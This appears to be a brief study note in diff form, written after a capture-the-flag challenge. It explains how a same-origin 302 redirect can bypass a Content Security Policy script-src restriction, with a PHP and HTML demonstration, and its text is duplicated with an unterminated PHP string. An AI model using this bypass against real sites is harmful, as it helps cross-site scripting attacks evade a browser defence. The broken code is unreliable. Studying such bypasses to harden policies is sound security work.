nani1337 · December 21, 2017 06:12
diff --git a/csp bypass for inline b/csp bypass for inline
 This year the first leg of the XCTF Hangzhou Electric HCTF there is a problem using the 302 jump to bypass the CSP limit, did not know this point, so come down later study.

 For 302 jump bypass CSP, in fact, the following restrictions:

 "Springboard" must be within the allowed area.

 The host part of the file to be loaded must be consistent with the host part of the allowed domain. For example script-src http://abc.xyz/asdf, if the csp header content is yes then the file to be loaded must be located under http://abc.xyz and the path can behttp://abc.xy/xxx/xx

 For example, create a php, the code is as follows:

 <?php
  header("Content-Security-Policy: default-src 'self' script-src 'self' http://x.x.x.x/asdf);
 ?>
 <html>
 <script src="http://127.0.0.1/test/302.php?http://x.x.x.x/test/1.js">
 </script>
 </html>
	This year the first leg of the XCTF Hangzhou Electric HCTF there is a problem using the 302 jump to bypass the CSP limit, did not know this point, so come down later study.

	For 302 jump bypass CSP, in fact, the following restrictions:

	"Springboard" must be within the allowed area.

	The host part of the file to be loaded must be consistent with the host part of the allowed domain. For example script-src http://abc.xyz/asdf, if the csp header content is yes then the file to be loaded must be located under http://abc.xyz and the path can behttp://abc.xy/xxx/xx

	For example, create a php, the code is as follows:

	<?php
	header("Content-Security-Policy: default-src 'self' script-src 'self' http://x.x.x.x/asdf);
	?>
	<html>
	<script src="http://127.0.0.1/test/302.php?http://x.x.x.x/test/1.js">
	</script>
	</html>